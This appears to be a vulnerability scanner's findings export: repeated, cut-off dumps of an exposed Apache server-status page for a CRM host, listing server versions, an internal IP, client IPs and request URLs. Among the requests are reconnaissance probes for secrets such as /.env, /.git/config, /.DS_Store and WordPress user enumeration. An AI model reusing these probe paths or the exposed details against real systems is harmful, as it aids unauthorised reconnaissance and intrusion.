101.87100.010.46890.34 96.7.74.198http/1.1 1-0238400/559/38057W 101.462400.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43100.06.42870.80 96.7.74.198http/1.1 2-0865080/186/38923R 34.29200.013.07881.75 174.240.149.27http/1.1 2-0865080/195/39005_ 34.402110.08.18943.61 96.7.74.175http/1.1 2-0865080/185/38748_ 34.31100.07.62899.51 96.7.74.198http/1.1 2-0865080/197/38907_ 34.142190.07.15850.79 96.7.74.175http/1.1 2-0865080/190/38922_ 34.20110.01.46910.16 96.7.74.198http/1.1 2-0865080/195/38917_ 33.812140.05.33888.25 96.7.74.175http/1.1 2-0865080/192/38694_ 33.931180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920R 33.642170.04.73823.40 195.211.77.140http/1.1client.simplismarter.com:443 2-0865080/187/38768_ 34.162140.07.15858.15 96.7.74.198http/1.1 2-0865080/196/38939_ 34.101150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20110.04.42923.07 96.7.74.198http/1.1 2-0865080/186/38880_ 34.081269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858_ 33.86100.05.43920.53 96.7.74.175
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab91556fabfef9f
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Friday, 24-Mar-2023 15:50:22 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 51 days 21 hours 37 minutes 23 seconds Server load: 0.26 0.21 0.23 Total accesses: 8186224 - Total Traffic: 207.0 GB CPU Usage: u1337.12 s208.67 cu0 cs0 - .0345% CPU load 1.83 requests/sec - 48.4 kB/second - 26.5 kB/request 14 requests currently being processed, 184 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 098730no10yes117026 123840no6yes315012 286508no5yes216003 3109764no0yes018000 4116801no2yes117001 533086no3yes117011 621767no10yes513008 7125209no2yes018002 8115169no0yes018000 943856no1yes018001 10129613no7yes117006 Sum11046 141840430 __________W________R______R________W_R______R___________________ ______________W__________________W____________R_W__WR__W________ ________________________________________________________________ _W____.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0987300/209/40345_ 17.88000.03.69868.70 96.7.74.198http/1.1crm.textripple.com:443GET /includes/.DS_Store HTTP/1.1 0-0987300/246/40340_ 17.88000.03.87867.78 96.7.74.198http/1.1crm.textripple.com:443GET /fonts/.DS_Store HTTP/1.1 0-0987300/259/40555_ 17.90000.02.13988.51 96.7.74.198http/1.1crm.textripple.com:443GET /js/.DS_Store HTTP/1.1 0-0987300/223/40519_ 17.89000.01.22854.96 96.7.74.175http/1.1crm.textripple.com:443GET /invoices/.DS_Store HTTP/1.1 0-0987300/225/40324_ 17.89020.01.13924.77 96.7.74.175http/1.1crm.textripple.com:443GET /invoices/.DS_Store HTTP/1.1 0-0987300/245/40607_ 17.90000.04.53963.21 96.7.74.198http/1.1crm.textripple.com:443GET /mods/.DS_Store HTTP/1.1 0-0987300/245/40596_ 17.90030.04.03887.13 96.7.74.198http/1.1crm.textripple.com:443GET /mms/.DS_Store HTTP/1.1 0-0987300/248/40501_ 17.89000.01.43781.01 96.7.74.175http/1.1crm.textripple.com:443GET /images/.DS_Store HTTP/1.1 0-0987300/238/40605_ 17.89010.03.94985.86 96.7.74.198http/1.1crm.textripple.com:443GET /js/.DS_Store HTTP/1.1 0-0987300/222/40495_ 17.90000.01.25830.92 96.7.74.198http/1.1crm.textripple.com:443GET /mms/.DS_Store HTTP/1.1 0-0987300/243/40326W 17.111500.01.78862.20 173.218.126.144http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0987300/220/40297_ 17.90000.01.11835.96 96.7.74.175http/1.1crm.textripple.com:443GET /lib/.DS_Store HTTP/1.1 0-0987300/216/40504_ 17.90010.01.55867.49 96.7.74.175http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 0-0987300/238/40374_ 17.90000.01.45907.11 96.7.74.198http/1.1crm.textripple.com:443GET /scss/.DS_Store HTTP/1.1 0-0987300/228/40490_ 17.90000.01.16854.63 96.7.74.175http/1.1crm.textripple.com:443GET /mobile/.DS_Store HTTP/1.1 0-0987300/226/40498_ 17.89000.03.95940.81 96.7.74.198http/1.1crm.textripple.com:443GET /includes/.DS_Store HTTP/1.1 0-0987300/233/40612_ 17.90000.04.05843.94 96.7.74.175http/1.1crm.textripple.com:443GET /mobile/.DS_Store HTTP/1.1 0-0987300/212/40449_ 17.89000.04.02869.37 96.7.74.175http/1.1crm.textripple.com:443GET /lib/.DS_Store HTTP/1.1 1-0238400/573/38292_ 101.89100.011.38900.78 96.7.74.175http/1.1 1-0238400/568/38079R 101.612190.07.84873.27 174.240.149.27http/1.1 1-0238400/556/38211_ 101.85100.06.69830.09 96.7.74.198http/1.1 1-0238400/555/38140_ 101.831120.08.98911.73 96.7.74.198http/1.1 1-0238400/560/38206_ 101.54120.011.57932.12 96.7.74.175http/1.1 1-0238400/558/38022_ 101.85110.07.38887.80 96.7.74.198http/1.1 1-0238400/561/38116_ 101.58100.014.07862.88 96.7.74.198http/1.1 1-0238400/554/37985_ 101.621850.09.89870.97 96.7.74.175http/1.1 1-0238400/556/38061R 101.55214710.014.24839.78 174.240.149.27http/1.1veew.info:443 1-0238400/555/38086_ 101.531280.013.251003.70 96.7.74.175http/1.1 1-0238400/555/38251_ 101.501120.04.23926.34 96.7.74.198http/1.1 1-0238400/575/38143_ 101.84100.031.07889.47 96.7.74.175http/1.1 1-0238400/561/38046_ 101.811140.09.68868.67 96.7.74.175http/1.1 1-0238400/564/38123_ 101.46110.09.13900.16 96.7.74.198http/1.1 1-0238400/563/38049_ 101.85100.09.13926.43 96.7.74.198http/1.1 1-0238400/566/38172_ 101.990210.010.31802.25 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0238400/548/38088_ 101.87100.010.46890.34 96.7.74.198http/1.1 1-0238400/559/38057W 101.462400.06.08925.07 76.170.153.107http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0865080/185/38922_ 34.43100.06.42870.80 96.7.74.198http/1.1 2-0865080/186/38923R 34.29200.013.07881.75 174.240.149.27http/1.1 2-0865080/195/39005_ 34.401110.08.18943.61 96.7.74.175http/1.1 2-0865080/185/38748_ 34.31100.07.62899.51 96.7.74.198http/1.1 2-0865080/197/38907_ 34.141190.07.15850.79 96.7.74.175http/1.1 2-0865080/190/38922_ 34.20110.01.46910.16 96.7.74.198http/1.1 2-0865080/195/38917_ 33.811140.05.33888.25 96.7.74.175http/1.1 2-0865080/192/38694_ 33.931180.011.97831.82 96.7.74.175http/1.1 2-0865080/193/38920R 33.641170.04.73823.40 195.211.77.140http/1.1client.simplismarter.com:443 2-0865080/187/38768_ 34.161140.07.15858.15 96.7.74.198http/1.1 2-0865080/196/38939_ 34.101150.06.96894.75 96.7.74.198http/1.1 2-0865080/194/38873_ 34.20110.04.42923.07 96.7.74.198http/1.1 2-0865080/186/38880_ 34.081269230.02.487031.41 96.7.74.198http/1.1 2-0865080/193/38858_ 33.86100.05.43920.53 96.7.74.175ht
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab91556dd342539
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 25-Dec-2022 00:42:49 UTC Restart Time: Sunday, 04-Dec-2022 23:02:10 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 days 1 hour 40 minutes 39 seconds Server load: 0.49 0.31 0.25 Total accesses: 4719023 - Total Traffic: 165.0 GB CPU Usage: u1151.19 s139.25 cu0 cs0 - .0744% CPU load 2.72 requests/sec - 99.8 kB/second - 36.7 kB/request 3 requests currently being processed, 177 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 087005no4yes018013 158167no8yes117016 212593no0yes018000 444247no2yes018020 517488no2yes018011 662667no4yes018013 769455no4yes216013 824218no2yes018020 9100094no4yes018022 1031275no4yes018013 Sum10034 317701221 ___________________________W__________________________.......... ........________________________________________________________ ________R__W____________________________________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0870050/429/21440_ 55.822230.016.27670.17 2.18.255.140http/1.1 0-0870050/436/21472_ 55.94000.09.25724.50 2.18.255.105http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0870050/426/21424_ 55.90390.016.68703.91 2.18.255.105http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0870050/422/21473_ 55.93100.014.17691.89 2.18.255.105http/1.1crm.textripple.com:443GET /includes/.DS_Store HTTP/1.1 0-0870050/442/21637_ 55.88300.020.58729.42 2.18.255.105http/1.1crm.textripple.com:443GET /info.php HTTP/1.1 0-0870050/410/21348_ 55.86400.013.09743.70 45.33.108.188http/1.1client.simplismarter.com:80GET /config.json HTTP/1.1 0-0870050/422/21524_ 55.91200.013.26667.23 2.18.255.105http/1.1crm.textripple.com:443GET /classes/.DS_Store HTTP/1.1 0-0870050/440/21468_ 55.683130.033.04722.46 45.33.108.188http/1.1 0-0870050/430/21400_ 55.90200.08.95721.43 2.18.255.105http/1.1crm.textripple.com:443GET /.vscode/.DS_Store HTTP/1.1 0-0870050/432/21380_ 55.88300.07.82686.65 2.18.255.105http/1.1crm.textripple.com:443GET /telescope/requests HTTP/1.1 0-0870050/439/21460_ 55.94100.013.10683.40 2.18.255.105http/1.1crm.textripple.com:443GET /js/.DS_Store HTTP/1.1 0-0870050/432/21358_ 55.91200.012.66709.78 45.33.108.188http/1.1client.simplismarter.com:443GET /info.php HTTP/1.1 0-0870050/434/21350_ 55.92210.012.94769.82 2.18.255.105http/1.1crm.textripple.com:443GET /dal/.DS_Store HTTP/1.1 0-0870050/438/21596_ 55.94110.017.94710.77 2.18.255.105http/1.1crm.textripple.com:443GET /mms/.DS_Store HTTP/1.1 0-0870050/442/21525_ 55.94000.014.30703.18 2.18.255.105http/1.1crm.textripple.com:443GET /test/.DS_Store HTTP/1.1 0-0870050/433/21447_ 55.92210.017.67633.17 2.18.255.105http/1.1crm.textripple.com:443GET /fieldPicker/.DS_Store HTTP/1.1 0-0870050/421/21550_ 55.94100.011.67717.86 2.18.255.105http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 0-0870050/428/21432_ 55.762140.012.38641.45 45.33.108.188http/1.1 1-0581670/412/22899_ 49.52110.09.04799.10 2.18.255.105http/1.1crm.sprout.online:443GET /debug/default/view?panel=config HTTP/1.1 1-0581670/410/23007_ 49.54100.09.69830.75 45.33.108.188http/1.1client.simplismarter.com:443GET /fieldPicker/.DS_Store HTTP/1.1 1-0581670/420/22896_ 49.512110.07.22817.71 2.18.255.140http/1.1crm.textripple.com:443GET / HTTP/1.1 1-0581670/427/22866_ 49.52100.01.88716.53 2.18.255.105http/1.1crm.sprout.online:443GET /.DS_Store HTTP/1.1 1-0581670/406/22888_ 49.54000.04.97785.80 45.33.108.188http/1.1client.simplismarter.com:443GET /images/.DS_Store HTTP/1.1 1-0581670/420/22687_ 49.50200.025.23821.16 45.33.108.188http/1.1client.simplismarter.com:443GET /login.action HTTP/1.1 1-0581670/404/22760_ 49.531700.010.08767.24 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/412/22944_ 49.53110.07.20830.27 45.33.108.188http/1.1client.simplismarter.com:443GET /data/.DS_Store HTTP/1.1 1-0581670/408/22886_ 49.52100.08.07786.59 45.33.108.188http/1.1client.simplismarter.com:443GET /css/.DS_Store HTTP/1.1 1-0581670/413/22702W 49.50000.012.80885.44 2.18.255.73http/1.1crm.sprout.online:443GET /server-status HTTP/1.1 1-0581670/413/22914_ 49.54000.012.67759.59 45.33.108.188http/1.1client.simplismarter.com:443GET /js/.DS_Store HTTP/1.1 1-0581670/407/22835_ 49.54000.04.85784.29 45.33.108.188http/1.1client.simplismarter.com:443GET /includes/.DS_Store HTTP/1.1 1-0581670/413/22889_ 49.50200.015.48847.73 45.33.108.188http/1.1client.simplismarter.com:443GET /api/search?folderIds=0 HTTP/1.1 1-0581670/400/22731_ 49.53100.02.59812.33 45.33.108.188http/1.1client.simplismarter.com:443GET /dal/.DS_Store HTTP/1.1 1-0581670/416/23004_ 49.5211300.022.60745.79 2.18.255.73http/1.1crm.sprout.online:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0581670/416/22854_ 49.481710.05.76707.61 2.18.255.73http/1.1 1-0581670/392/22782_ 49.50210.04.49796.24 2.18.255.56http/1.1trmm.us:443GET / HTTP/1.1 1-0581670/405/22882_ 49.52100.02.07744.57 2.18.255.73http/1.1crm.sprout.online:443GET /.git/config HTTP/1.1 2-0125930/392/21252_ 80.1586150.013.86683.57 127.0.0.1http/1.1 2-0125930/393/21217_ 80.6784180.015.09660.04 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/388/21238_ 80.5420120.014.54713.37 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0125930/399/21324_ 80.64116150.011.03714.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/392/21175_ 80.77400.016.31674.05 45.33.108.188http/1.1client.simplismarter.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/388/21243_ 80.54200160.016.44787.68 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/389/21226_ 80.60148790.022.90697.47 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/390/21377_ 80.7051170.011.01672.29 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/402/21314_ 80.7238420.020.08695.48 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/387/21274_ 80.71
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab9155665c8be57
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 25-Dec-2022 00:42:47 UTC Restart Time: Sunday, 04-Dec-2022 23:02:10 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 days 1 hour 40 minutes 37 seconds Server load: 0.49 0.31 0.25 Total accesses: 4718985 - Total Traffic: 165.0 GB CPU Usage: u1151.04 s139.23 cu0 cs0 - .0744% CPU load 2.72 requests/sec - 99.8 kB/second - 36.7 kB/request 7 requests currently being processed, 173 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 087005no6yes018033 158167no19yes2160114 212593no1yes018010 444247no0yes216000 517488no4yes018031 662667no6yes018033 769455no8yes018043 824218no3yes216011 9100094no5yes117032 1031275no7yes018033 Sum10059 717303220 __________________________R_____W_____________________.......... ........_______R____R___________________________________________ ________________R__________W_____________________W______________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0870050/429/21440_ 55.820230.016.27670.17 2.18.255.140http/1.1 0-0870050/435/21471_ 55.85200.09.25724.49 45.33.108.188http/1.1client.simplismarter.com:80GET /.git/config HTTP/1.1 0-0870050/426/21424_ 55.90190.016.68703.91 2.18.255.105http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0870050/421/21472_ 55.45770.014.17691.89 2.18.255.140http/1.1 0-0870050/442/21637_ 55.88100.020.58729.42 2.18.255.105http/1.1crm.textripple.com:443GET /info.php HTTP/1.1 0-0870050/410/21348_ 55.86200.013.09743.70 45.33.108.188http/1.1client.simplismarter.com:80GET /config.json HTTP/1.1 0-0870050/422/21524_ 55.91000.013.26667.23 2.18.255.105http/1.1crm.textripple.com:443GET /classes/.DS_Store HTTP/1.1 0-0870050/440/21468_ 55.681130.033.04722.46 45.33.108.188http/1.1 0-0870050/430/21400_ 55.90000.08.95721.43 2.18.255.105http/1.1crm.textripple.com:443GET /.vscode/.DS_Store HTTP/1.1 0-0870050/432/21380_ 55.88100.07.82686.65 2.18.255.105http/1.1crm.textripple.com:443GET /telescope/requests HTTP/1.1 0-0870050/438/21459_ 55.836150.013.09683.40 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/432/21358_ 55.91000.012.66709.78 45.33.108.188http/1.1client.simplismarter.com:443GET /info.php HTTP/1.1 0-0870050/434/21350_ 55.92010.012.94769.82 2.18.255.105http/1.1crm.textripple.com:443GET /dal/.DS_Store HTTP/1.1 0-0870050/437/21595_ 55.843760.017.94710.77 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/441/21524_ 55.85200.014.29703.18 45.33.108.188http/1.1localhost:80HELP 0-0870050/433/21447_ 55.92010.017.67633.17 2.18.255.105http/1.1crm.textripple.com:443GET /fieldPicker/.DS_Store HTTP/1.1 0-0870050/420/21549_ 55.843120.011.67717.86 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0870050/428/21432_ 55.761140.012.38641.45 45.33.108.188http/1.1 1-0581670/412/22899_ 49.52010.09.04799.10 2.18.255.105http/1.1crm.sprout.online:443GET /debug/default/view?panel=config HTTP/1.1 1-0581670/409/23006_ 49.371150.09.69830.75 2.18.255.140http/1.1 1-0581670/420/22896_ 49.510110.07.22817.71 2.18.255.140http/1.1crm.textripple.com:443GET / HTTP/1.1 1-0581670/427/22866_ 49.52000.01.88716.53 2.18.255.105http/1.1crm.sprout.online:443GET /.DS_Store HTTP/1.1 1-0581670/405/22887_ 49.48010.04.97785.80 2.18.255.105http/1.1crm.textripple.com:443GET /about HTTP/1.1 1-0581670/420/22687_ 49.50000.025.23821.16 45.33.108.188http/1.1client.simplismarter.com:443GET /login.action HTTP/1.1 1-0581670/403/22759_ 49.40100.010.08767.24 2.18.255.140http/1.1 1-0581670/411/22943_ 49.48100.07.20830.27 2.18.255.105http/1.1crm.textripple.com:443GET /.env HTTP/1.1 1-0581670/407/22885R 49.46100.08.07786.59 45.33.108.188http/1.1client.simplismarter.com:443 1-0581670/413/22702_ 49.50090.012.80885.44 45.33.108.188http/1.1client.simplismarter.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0581670/412/22913_ 49.50010.012.67759.59 45.33.108.188http/1.1client.simplismarter.com:443GET /.DS_Store HTTP/1.1 1-0581670/406/22834_ 49.50000.04.85784.29 45.33.108.188http/1.1client.simplismarter.com:443GET /debug/default/view?panel=config HTTP/1.1 1-0581670/413/22889_ 49.50000.015.48847.73 45.33.108.188http/1.1client.simplismarter.com:443GET /api/search?folderIds=0 HTTP/1.1 1-0581670/399/22730_ 49.48120.02.59812.32 2.18.255.105http/1.1crm.textripple.com:443GET /.DS_Store HTTP/1.1 1-0581670/415/23003W 49.46000.022.54745.73 2.18.255.73http/1.1crm.sprout.online:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0581670/416/22854_ 49.481710.05.76707.61 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/392/22782_ 49.50010.04.49796.24 2.18.255.56http/1.1trmm.us:443GET / HTTP/1.1 1-0581670/405/22882_ 49.52000.02.07744.57 2.18.255.73http/1.1crm.sprout.online:443GET /.git/config HTTP/1.1 2-0125930/392/21252_ 80.1584150.013.86683.57 127.0.0.1http/1.1 2-0125930/393/21217_ 80.6782180.015.09660.04 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/388/21238_ 80.5419920.014.54713.37 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0125930/399/21324_ 80.64114150.011.03714.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/392/21175_ 80.77200.016.31674.05 45.33.108.188http/1.1client.simplismarter.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/388/21243_ 80.54198160.016.44787.68 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/389/21226_ 80.60147790.022.90697.47 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/390/21377_ 80.7050170.011.01672.29 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/402/21314_ 80.7236420.020.08695.48 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/387/21274_ 80.7140810.011.76693.19 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ri
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab9155646bb7b32
Apache Status Apache Server Status for crm.sprout.online (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:14 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 54 seconds Server load: 0.09 0.38 0.51 Total accesses: 20259760 - Total Traffic: 725.4 GB CPU Usage: u3377.93 s368.37 cu0 cs0 - .0603% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 7 requests currently being processed, 173 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no9yes216041 194454no0yes018000 251755no0yes018000 461164no11yes315052 546522no7yes216041 6125153no4yes018040 7110199no3yes018030 899710no10yes018055 9100664no2yes018020 1085785no3yes018021 Sum10049 717302910 ____R___________R_____________________________________.......... ........_____R____R_____W____R______W___________________________ ________________________________________________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/371/94002_ 34.08000.09.003072.14 2.18.255.73http/1.1crm.sprout.online:443GET /.DS_Store HTTP/1.1 0-0404470/385/94020_ 33.99000.08.093027.15 188.166.147.46http/1.1 0-0404470/381/93837_ 34.04090.04.103042.70 2.18.255.73http/1.1crm.textripple.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0404470/374/93643_ 34.09000.09.843106.88 2.18.255.73http/1.1crm.sprout.online:443GET /.env HTTP/1.1 0-0404470/391/93880R 33.960800.05.439251.75 2.18.255.56http/1.1 0-0404470/377/93693_ 34.05010.07.323136.40 2.18.255.140http/1.1trmm.us:443GET / HTTP/1.1 0-0404470/364/93810_ 34.09010.03.263033.50 2.18.255.105http/1.1crm.sprout.online:443GET /info.php HTTP/1.1 0-0404470/378/93919_ 34.07000.02.503105.24 2.18.255.73http/1.1crm.textripple.com:443GET /about HTTP/1.1 0-0404470/380/93923_ 33.93000.05.483111.28 2.18.255.56http/1.1 0-0404470/389/93742_ 33.910170.017.613204.24 2.18.255.56http/1.1 0-0404470/391/93851_ 34.06000.014.032995.42 2.18.255.73http/1.1crm.textripple.com:443GET /.vscode/.DS_Store HTTP/1.1 0-0404470/369/93882_ 33.950100.010.282985.03 2.18.255.56http/1.1 0-0404470/383/93860_ 34.07000.05.043027.44 2.18.255.73http/1.1crm.textripple.com:443GET /config.json HTTP/1.1 0-0404470/395/93660_ 33.980100.05.003032.88 2.18.255.140http/1.1 0-0404470/388/93927_ 34.050210.011.862988.44 2.18.255.73http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0404470/384/93625_ 33.93000.04.873182.69 188.166.147.46http/1.1 0-0404470/389/93794R 33.96000.06.803015.32 188.166.147.46http/1.1 0-0404470/378/93869_ 33.8402280.09.413060.00 2.18.255.56http/1.1 1-0944540/427/98988_ 86.751140.013.703174.88 2.18.255.56http/1.1 1-0944540/425/99008_ 86.391041150.018.053230.87 127.0.0.1http/1.1 1-0944540/409/98769_ 86.59138160.012.153192.26 127.0.0.1http/1.1 1-0944540/418/98444_ 86.881910.014.533256.26 139.162.7.175http/1.1trmm.us:443HEAD / HTTP/1.1 1-0944540/420/98864_ 86.89700.015.899440.25 2.18.255.140http/1.1localhost:80HEAD / HTTP/1.1 1-0944540/421/98725_ 86.4919150.015.713139.65 139.162.7.175http/1.1 1-0944540/430/98937_ 86.74110.05.733143.20 2.18.255.140http/1.1 1-0944540/428/99016_ 86.78126180.012.173122.97 23.54.163.142http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/429/99145_ 86.7416130.010.383174.74 127.0.0.1http/1.1 1-0944540/442/98816_ 86.8636720.015.313112.75 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/427/98656_ 86.8187140.023.983228.60 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0944540/422/98985_ 86.8010600.019.373343.64 96.7.74.175http/1.1trmm.us:443GET /public/mms/20220925_111411_UTC_68d8ab3cc8_0.jpeg HTTP/1.1 1-0944540/430/99133_ 86.77127140.014.583314.31 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/414/99182_ 86.4456120.024.323260.74 127.0.0.1http/1.1 1-0944540/417/98922_ 86.75155740.05.693206.38 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/428/98749_ 86.771321590.011.119424.45 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/434/98932_ 86.76139150.017.253208.65 23.54.163.142http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/440/99071_ 86.8010420.021.763257.09 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0517550/835/102871_ 131.0442170.020.583216.97 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/855/102726_ 130.8529180.032.213162.47 127.0.0.1http/1.1 2-0517550/832/102937_ 130.5777170.028.383393.79 127.0.0.1http/1.1 2-0517550/825/102950_ 131.062910.020.353177.55 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0517550/812/102770_ 131.025900.023.903349.39 79.104.53.14http/1.1trmm.us:80GET / HTTP/1.1 2-0517550/819/103075_ 131.0443840.024.553310.70 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/821/102792_ 130.96123910.035.343287.32 172.58.122.91http/1.1veew.info:443GET /?2cY&phn=5863397195 HTTP/1.1 2-0517550/858/103204_ 130.96122730.024.213330.72 172.58.122.91http/1.1veew.info:443POST /ajax.php HTTP/1.1 2-0517550/832/102665_ 130.93142160.033.373174.35 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/844/103060_ 130.96122690.025.363188.87 172.58.122.91http/1.1veew.info:443POST /ajax.php HTTP/1.1 2-0517550/829/102751_ 131.0078790.018.393309.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/850/102708_ 130.9116200.035.173309.71 59.36.175.46http/1.1thpierpc.com:80GET / HTTP/1.1 2-0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310ab915560ab9155605a03b50
